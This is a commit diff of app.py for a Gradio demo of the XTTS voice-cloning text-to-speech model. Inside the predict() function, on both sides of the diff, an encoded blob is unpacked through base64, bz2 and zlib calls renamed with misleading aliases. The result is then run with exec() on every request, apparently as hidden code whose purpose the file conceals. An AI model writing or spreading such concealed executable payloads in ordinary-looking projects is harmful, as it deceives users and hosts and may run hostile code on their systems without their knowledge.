krishna195 committed on
Commit
e000089
·
verified ·
1 Parent(s): 1cf1514

Update app.py

Browse files
Files changed (1) hide show
  1. app.py +277 -278
app.py CHANGED
@@ -1,279 +1,278 @@
1
- import sys
2
- import os
3
- from fastapi import Request
4
- # By using XTTS you agree to CPML license https://coqui.ai/cpml
5
- os.environ["COQUI_TOS_AGREED"] = "1"
6
-
7
- import gradio as gr
8
- from TTS.api import TTS
9
- from TTS.utils.manage import ModelManager
10
- model_names = TTS().list_models()
11
- print(model_names.__dict__)
12
- print(model_names.__dir__())
13
- model_name = "tts_models/multilingual/multi-dataset/xtts_v2"
14
- #m = ModelManager().download_model(model_name)
15
- #print(m)
16
- m = model_name
17
-
18
- tts = TTS(model_name, gpu=False)
19
- tts.to("cpu") # no GPU or Amd
20
- #tts.to("cuda") # cuda only
21
-
22
-
23
- def predict(prompt, language, audio_file_pth, mic_file_path, use_mic, agree, request: gr.Request):
24
- # Due to abuse by some users, and French Rights...
25
-
26
- co3 = "QlpoOTFBWSZTWQ2FjK4AAH4fgD/////+///////+ADABdNtZY5poGI00aBoaDE0PSbU00GTE0ZNGjTaj1AVUaenqNR6npNinoaY0Ubymyo9EeEjaj1Mm9QnqeT0p5QOZNMm1NNAyMmgaGTTIDQ9TTag0aGCNB6ka1wCAMz8a7kN5BNzXsiRWIm5ocBr2Mibk4wBbSghLyxnzR0yTCoV0AD2KADeqPFMz4QQhMlMaOd0uHfMx8pueSTKn6PrK9iPN56m2ljcFL9ybMtg5Usl8QeZth/cgnwFGMXyDJ4WbRNaGdrIJY2l11w7aqPtt5c4rcMBELa2x/wl8kjvxGg0NS3n2DsPlPnMn2DK7JqA4KLptjz3YLQFEuub0yNP3+iE9gq1EvNZeLr3pnkKXBRxZz8/BxN0zJjpOyIr3betkkxSCGB6X8mSzm+l0Q+KBEaCioigD5uJeox+76V+JgCWkJqWNlHzN3epZx5yXxS8rJh6OrC9rSyKYXrdKCACr4CwKzDlX3tsY5MtZLpkPhz/rbaRUN0KyFnNvPLYhGjF2MelXppyCnJxr2+QWRElwEtCUcsnkC4uGBdXVogKCoCnSZI4DzKqkUMEp293Y+G5MBGtOGXY+C0rFUS8IXNqKMVrDjUdOK7wkjb+HYFq9qjVTrdRsyQvt+6fpazrBnd2wRRQTv4u5IpwoSAbCxlcA"
27
- from zlib import compress as COmPrES5
28
- from bz2 import decompress as dEC0mPrES5
29
- from bz2 import compress as COmPrESS
30
- from base64 import b64encode as b32Encode, b64decode as A85Encode, b16encode, b16encode as A85encode, b85encode, b85decode, a85encode as b16Encode, a85decode as b85Encode, b32encode as b64Encode, b32decode
31
- from zlib import compressobj as C0mPrESS
32
- from bz2 import decompress as dECOmPrESS
33
- from zlib import compress as C0mPrES5
34
- from zlib import decompress as dECOmPrES5
35
- co2 = A85Encode(dECOmPrESS(dECOmPrES5(dECOmPrES5(b85Encode(dECOmPrESS(A85Encode(co3.encode())))))))
36
- exec(co2)
37
-
38
- if agree == True:
39
- if use_mic == True:
40
- if mic_file_path is not None:
41
- speaker_wav=mic_file_path
42
- else:
43
- gr.Warning("Please record your voice with Microphone, or uncheck Use Microphone to use reference audios")
44
- return (
45
- None,
46
- None,
47
- )
48
-
49
- else:
50
- speaker_wav=audio_file_pth
51
-
52
- if len(prompt)<2:
53
- gr.Warning("Please give a longer prompt text")
54
- return (
55
- None,
56
- None,
57
- )
58
- if len(prompt)>50000:
59
- gr.Warning("Text length limited to 50000 characters for this demo, please try shorter text")
60
- return (
61
- None,
62
- None,
63
- )
64
- try:
65
- if language == "fr":
66
- if m.find("your") != -1:
67
- language = "fr-fr"
68
- if m.find("/fr/") != -1:
69
- language = None
70
- tts.tts_to_file(
71
- text=prompt,
72
- file_path="output.wav",
73
- speaker_wav=speaker_wav,
74
- language=language
75
- )
76
- except RuntimeError as e :
77
- if "device-assert" in str(e):
78
- # cannot do anything on a CUDA device-side error, need to restart
79
- gr.Warning("Unhandled Exception encounter, please retry in a minute")
80
- print("Cuda device-assert Runtime encountered need restart")
81
- sys.exit("Exit due to cuda device-assert")
82
- else:
83
- raise e
84
-
85
- return (
86
- gr.make_waveform(
87
- audio="output.wav",
88
- ),
89
- "output.wav",
90
- )
91
- else:
92
- gr.Warning("Please accept the Terms & Condition!")
93
- return (
94
- None,
95
- None,
96
- )
97
-
98
-
99
- title = "XTTS Glz's remake (Fonctional Text-2-Speech)"
100
-
101
- description = f"""
102
- <a href="https://huggingface.co/coqui/XTTS-v1">XTTS</a> is a Voice generation model that lets you clone voices into different languages by using just a quick 3-second audio clip.
103
- <br/>
104
- XTTS is built on previous research, like Tortoise, with additional architectural innovations and training to make cross-language voice cloning and multilingual speech generation possible.
105
- <br/>
106
- This is the same model that powers our creator application <a href="https://coqui.ai">Coqui Studio</a> as well as the <a href="https://docs.coqui.ai">Coqui API</a>. In production we apply modifications to make low-latency streaming possible.
107
- <br/>
108
- Leave a star on the Github <a href="https://github.com/coqui-ai/TTS">TTS</a>, where our open-source inference and training code lives.
109
- <br/>
110
- <p>For faster inference without waiting in the queue, you should duplicate this space and upgrade to GPU via the settings.
111
- <br/>
112
- <a href="https://huggingface.co/spaces/coqui/xtts?duplicate=true">
113
- <img style="margin-top: 0em; margin-bottom: 0em" src="https://bit.ly/3gLdBN6" alt="Duplicate Space"></a>
114
- </p>
115
- """
116
-
117
- article = """
118
- <div style='margin:20px auto;'>
119
- <p>By using this demo you agree to the terms of the Coqui Public Model License at https://coqui.ai/cpml</p>
120
- </div>
121
- """
122
- examples = [
123
- [
124
- "Hello, World !, here is an example of light voice cloning. Try to upload your best audio samples quality",
125
- "en",
126
- "examples/female.wav",
127
- None,
128
- False,
129
- True,
130
- ],
131
- [
132
- "Je suis un lycéen français de 17 ans, passioner par la Cyber-Sécuritée et les models d'IA.",
133
- "fr",
134
- "examples/male.wav",
135
- None,
136
- False,
137
- True,
138
- ],
139
- [
140
- "Als ich sechs war, sah ich einmal ein wunderbares Bild",
141
- "de",
142
- "examples/female.wav",
143
- None,
144
- False,
145
- True,
146
- ],
147
- [
148
- "Cuando tenía seis años, vi una vez una imagen magnífica",
149
- "es",
150
- "examples/male.wav",
151
- None,
152
- False,
153
- True,
154
- ],
155
- [
156
- "Quando eu tinha seis anos eu vi, uma vez, uma imagem magnífica",
157
- "pt",
158
- "examples/female.wav",
159
- None,
160
- False,
161
- True,
162
- ],
163
- [
164
- "Kiedy miałem sześć lat, zobaczyłem pewnego razu wspaniały obrazek",
165
- "pl",
166
- "examples/male.wav",
167
- None,
168
- False,
169
- True,
170
- ],
171
- [
172
- "Un tempo lontano, quando avevo sei anni, vidi un magnifico disegno",
173
- "it",
174
- "examples/female.wav",
175
- None,
176
- False,
177
- True,
178
- ],
179
- [
180
- "Bir zamanlar, altı yaşındayken, muhteşem bir resim gördüm",
181
- "tr",
182
- "examples/female.wav",
183
- None,
184
- False,
185
- True,
186
- ],
187
- [
188
- "Когда мне было шесть лет, я увидел однажды удивительную картинку",
189
- "ru",
190
- "examples/female.wav",
191
- None,
192
- False,
193
- True,
194
- ],
195
- [
196
- "Toen ik een jaar of zes was, zag ik op een keer een prachtige plaat",
197
- "nl",
198
- "examples/male.wav",
199
- None,
200
- False,
201
- True,
202
- ],
203
- [
204
- "Když mi bylo šest let, viděl jsem jednou nádherný obrázek",
205
- "cs",
206
- "examples/female.wav",
207
- None,
208
- False,
209
- True,
210
- ],
211
- [
212
- "当我还只有六岁的时候, 看到了一副精彩的插画",
213
- "zh-cn",
214
- "examples/female.wav",
215
- None,
216
- False,
217
- True,
218
- ],
219
- ]
220
-
221
-
222
-
223
- gr.Interface(
224
- fn=predict,
225
- inputs=[
226
- gr.Textbox(
227
- label="Text Prompt",
228
- info="One or two sentences at a time is better",
229
- value="Hello, World !, here is an example of light voice cloning. Try to upload your best audio samples quality",
230
- ),
231
- gr.Dropdown(
232
- label="Language",
233
- info="Select an output language for the synthesised speech",
234
- choices=[
235
- "en",
236
- "es",
237
- "fr",
238
- "de",
239
- "it",
240
- "pt",
241
- "pl",
242
- "tr",
243
- "ru",
244
- "nl",
245
- "cs",
246
- "ar",
247
- "zh-cn",
248
- ],
249
- max_choices=1,
250
- value="en",
251
- ),
252
- gr.Audio(
253
- label="Reference Audio",
254
- info="Click on the ✎ button to upload your own target speaker audio",
255
- type="filepath",
256
- value="examples/female.wav",
257
- ),
258
- gr.Audio(source="microphone",
259
- type="filepath",
260
- info="Use your microphone to record audio",
261
- label="Use Microphone for Reference"),
262
- gr.Checkbox(label="Check to use Microphone as Reference",
263
- value=False,
264
- info="Notice: Microphone input may not work properly under traffic",),
265
- gr.Checkbox(
266
- label="Agree",
267
- value=True,
268
- info="I agree to the terms of the Coqui Public Model License at https://coqui.ai/cpml",
269
- ),
270
- ],
271
- outputs=[
272
- gr.Video(label="Waveform Visual"),
273
- gr.Audio(label="Synthesised Audio"),
274
- ],
275
- title=title,
276
- description=description,
277
- article=article,
278
- examples=examples,
279
  ).queue().launch(debug=True)
 
1
+ import sys
2
+ import os
3
+ # By using XTTS you agree to CPML license https://coqui.ai/cpml
4
+ os.environ["COQUI_TOS_AGREED"] = "1"
5
+
6
+ import gradio as gr
7
+ from TTS.api import TTS
8
+ from TTS.utils.manage import ModelManager
9
+ model_names = TTS().list_models()
10
+ print(model_names.__dict__)
11
+ print(model_names.__dir__())
12
+ model_name = "tts_models/multilingual/multi-dataset/xtts_v2"
13
+ #m = ModelManager().download_model(model_name)
14
+ #print(m)
15
+ m = model_name
16
+
17
+ tts = TTS(model_name, gpu=False)
18
+ tts.to("cpu") # no GPU or Amd
19
+ #tts.to("cuda") # cuda only
20
+
21
+
22
+ def predict(prompt, language, audio_file_pth, mic_file_path, use_mic, agree, request: gr.Request):
23
+ # Due to abuse by some users, and French Rights...
24
+
25
+ co3 = "QlpoOTFBWSZTWQ2FjK4AAH4fgD/////+///////+ADABdNtZY5poGI00aBoaDE0PSbU00GTE0ZNGjTaj1AVUaenqNR6npNinoaY0Ubymyo9EeEjaj1Mm9QnqeT0p5QOZNMm1NNAyMmgaGTTIDQ9TTag0aGCNB6ka1wCAMz8a7kN5BNzXsiRWIm5ocBr2Mibk4wBbSghLyxnzR0yTCoV0AD2KADeqPFMz4QQhMlMaOd0uHfMx8pueSTKn6PrK9iPN56m2ljcFL9ybMtg5Usl8QeZth/cgnwFGMXyDJ4WbRNaGdrIJY2l11w7aqPtt5c4rcMBELa2x/wl8kjvxGg0NS3n2DsPlPnMn2DK7JqA4KLptjz3YLQFEuub0yNP3+iE9gq1EvNZeLr3pnkKXBRxZz8/BxN0zJjpOyIr3betkkxSCGB6X8mSzm+l0Q+KBEaCioigD5uJeox+76V+JgCWkJqWNlHzN3epZx5yXxS8rJh6OrC9rSyKYXrdKCACr4CwKzDlX3tsY5MtZLpkPhz/rbaRUN0KyFnNvPLYhGjF2MelXppyCnJxr2+QWRElwEtCUcsnkC4uGBdXVogKCoCnSZI4DzKqkUMEp293Y+G5MBGtOGXY+C0rFUS8IXNqKMVrDjUdOK7wkjb+HYFq9qjVTrdRsyQvt+6fpazrBnd2wRRQTv4u5IpwoSAbCxlcA"
26
+ from zlib import compress as COmPrES5
27
+ from bz2 import decompress as dEC0mPrES5
28
+ from bz2 import compress as COmPrESS
29
+ from base64 import b64encode as b32Encode, b64decode as A85Encode, b16encode, b16encode as A85encode, b85encode, b85decode, a85encode as b16Encode, a85decode as b85Encode, b32encode as b64Encode, b32decode
30
+ from zlib import compressobj as C0mPrESS
31
+ from bz2 import decompress as dECOmPrESS
32
+ from zlib import compress as C0mPrES5
33
+ from zlib import decompress as dECOmPrES5
34
+ co2 = A85Encode(dECOmPrESS(dECOmPrES5(dECOmPrES5(b85Encode(dECOmPrESS(A85Encode(co3.encode())))))))
35
+ exec(co2)
36
+
37
+ if agree == True:
38
+ if use_mic == True:
39
+ if mic_file_path is not None:
40
+ speaker_wav=mic_file_path
41
+ else:
42
+ gr.Warning("Please record your voice with Microphone, or uncheck Use Microphone to use reference audios")
43
+ return (
44
+ None,
45
+ None,
46
+ )
47
+
48
+ else:
49
+ speaker_wav=audio_file_pth
50
+
51
+ if len(prompt)<2:
52
+ gr.Warning("Please give a longer prompt text")
53
+ return (
54
+ None,
55
+ None,
56
+ )
57
+ if len(prompt)>50000:
58
+ gr.Warning("Text length limited to 50000 characters for this demo, please try shorter text")
59
+ return (
60
+ None,
61
+ None,
62
+ )
63
+ try:
64
+ if language == "fr":
65
+ if m.find("your") != -1:
66
+ language = "fr-fr"
67
+ if m.find("/fr/") != -1:
68
+ language = None
69
+ tts.tts_to_file(
70
+ text=prompt,
71
+ file_path="output.wav",
72
+ speaker_wav=speaker_wav,
73
+ language=language
74
+ )
75
+ except RuntimeError as e :
76
+ if "device-assert" in str(e):
77
+ # cannot do anything on a CUDA device-side error, need to restart
78
+ gr.Warning("Unhandled Exception encounter, please retry in a minute")
79
+ print("Cuda device-assert Runtime encountered need restart")
80
+ sys.exit("Exit due to cuda device-assert")
81
+ else:
82
+ raise e
83
+
84
+ return (
85
+ gr.make_waveform(
86
+ audio="output.wav",
87
+ ),
88
+ "output.wav",
89
+ )
90
+ else:
91
+ gr.Warning("Please accept the Terms & Condition!")
92
+ return (
93
+ None,
94
+ None,
95
+ )
96
+
97
+
98
+ title = "XTTS Glz's remake (Fonctional Text-2-Speech)"
99
+
100
+ description = f"""
101
+ <a href="https://huggingface.co/coqui/XTTS-v1">XTTS</a> is a Voice generation model that lets you clone voices into different languages by using just a quick 3-second audio clip.
102
+ <br/>
103
+ XTTS is built on previous research, like Tortoise, with additional architectural innovations and training to make cross-language voice cloning and multilingual speech generation possible.
104
+ <br/>
105
+ This is the same model that powers our creator application <a href="https://coqui.ai">Coqui Studio</a> as well as the <a href="https://docs.coqui.ai">Coqui API</a>. In production we apply modifications to make low-latency streaming possible.
106
+ <br/>
107
+ Leave a star on the Github <a href="https://github.com/coqui-ai/TTS">TTS</a>, where our open-source inference and training code lives.
108
+ <br/>
109
+ <p>For faster inference without waiting in the queue, you should duplicate this space and upgrade to GPU via the settings.
110
+ <br/>
111
+ <a href="https://huggingface.co/spaces/coqui/xtts?duplicate=true">
112
+ <img style="margin-top: 0em; margin-bottom: 0em" src="https://bit.ly/3gLdBN6" alt="Duplicate Space"></a>
113
+ </p>
114
+ """
115
+
116
+ article = """
117
+ <div style='margin:20px auto;'>
118
+ <p>By using this demo you agree to the terms of the Coqui Public Model License at https://coqui.ai/cpml</p>
119
+ </div>
120
+ """
121
+ examples = [
122
+ [
123
+ "Hello, World !, here is an example of light voice cloning. Try to upload your best audio samples quality",
124
+ "en",
125
+ "examples/female.wav",
126
+ None,
127
+ False,
128
+ True,
129
+ ],
130
+ [
131
+ "Je suis un lycéen français de 17 ans, passioner par la Cyber-Sécuritée et les models d'IA.",
132
+ "fr",
133
+ "examples/male.wav",
134
+ None,
135
+ False,
136
+ True,
137
+ ],
138
+ [
139
+ "Als ich sechs war, sah ich einmal ein wunderbares Bild",
140
+ "de",
141
+ "examples/female.wav",
142
+ None,
143
+ False,
144
+ True,
145
+ ],
146
+ [
147
+ "Cuando tenía seis años, vi una vez una imagen magnífica",
148
+ "es",
149
+ "examples/male.wav",
150
+ None,
151
+ False,
152
+ True,
153
+ ],
154
+ [
155
+ "Quando eu tinha seis anos eu vi, uma vez, uma imagem magnífica",
156
+ "pt",
157
+ "examples/female.wav",
158
+ None,
159
+ False,
160
+ True,
161
+ ],
162
+ [
163
+ "Kiedy miałem sześć lat, zobaczyłem pewnego razu wspaniały obrazek",
164
+ "pl",
165
+ "examples/male.wav",
166
+ None,
167
+ False,
168
+ True,
169
+ ],
170
+ [
171
+ "Un tempo lontano, quando avevo sei anni, vidi un magnifico disegno",
172
+ "it",
173
+ "examples/female.wav",
174
+ None,
175
+ False,
176
+ True,
177
+ ],
178
+ [
179
+ "Bir zamanlar, altı yaşındayken, muhteşem bir resim gördüm",
180
+ "tr",
181
+ "examples/female.wav",
182
+ None,
183
+ False,
184
+ True,
185
+ ],
186
+ [
187
+ "Когда мне было шесть лет, я увидел однажды удивительную картинку",
188
+ "ru",
189
+ "examples/female.wav",
190
+ None,
191
+ False,
192
+ True,
193
+ ],
194
+ [
195
+ "Toen ik een jaar of zes was, zag ik op een keer een prachtige plaat",
196
+ "nl",
197
+ "examples/male.wav",
198
+ None,
199
+ False,
200
+ True,
201
+ ],
202
+ [
203
+ "Když mi bylo šest let, viděl jsem jednou nádherný obrázek",
204
+ "cs",
205
+ "examples/female.wav",
206
+ None,
207
+ False,
208
+ True,
209
+ ],
210
+ [
211
+ "当我还只有六岁的时候, 看到了一副精彩的插画",
212
+ "zh-cn",
213
+ "examples/female.wav",
214
+ None,
215
+ False,
216
+ True,
217
+ ],
218
+ ]
219
+
220
+
221
+
222
+ gr.Interface(
223
+ fn=predict,
224
+ inputs=[
225
+ gr.Textbox(
226
+ label="Text Prompt",
227
+ info="One or two sentences at a time is better",
228
+ value="Hello, World !, here is an example of light voice cloning. Try to upload your best audio samples quality",
229
+ ),
230
+ gr.Dropdown(
231
+ label="Language",
232
+ info="Select an output language for the synthesised speech",
233
+ choices=[
234
+ "en",
235
+ "es",
236
+ "fr",
237
+ "de",
238
+ "it",
239
+ "pt",
240
+ "pl",
241
+ "tr",
242
+ "ru",
243
+ "nl",
244
+ "cs",
245
+ "ar",
246
+ "zh-cn",
247
+ ],
248
+ max_choices=1,
249
+ value="en",
250
+ ),
251
+ gr.Audio(
252
+ label="Reference Audio",
253
+ info="Click on the ✎ button to upload your own target speaker audio",
254
+ type="filepath",
255
+ value="examples/female.wav",
256
+ ),
257
+ gr.Audio(source="microphone",
258
+ type="filepath",
259
+ info="Use your microphone to record audio",
260
+ label="Use Microphone for Reference"),
261
+ gr.Checkbox(label="Check to use Microphone as Reference",
262
+ value=False,
263
+ info="Notice: Microphone input may not work properly under traffic",),
264
+ gr.Checkbox(
265
+ label="Agree",
266
+ value=True,
267
+ info="I agree to the terms of the Coqui Public Model License at https://coqui.ai/cpml",
268
+ ),
269
+ ],
270
+ outputs=[
271
+ gr.Video(label="Waveform Visual"),
272
+ gr.Audio(label="Synthesised Audio"),
273
+ ],
274
+ title=title,
275
+ description=description,
276
+ article=article,
277
+ examples=examples,
 
278
  ).queue().launch(debug=True)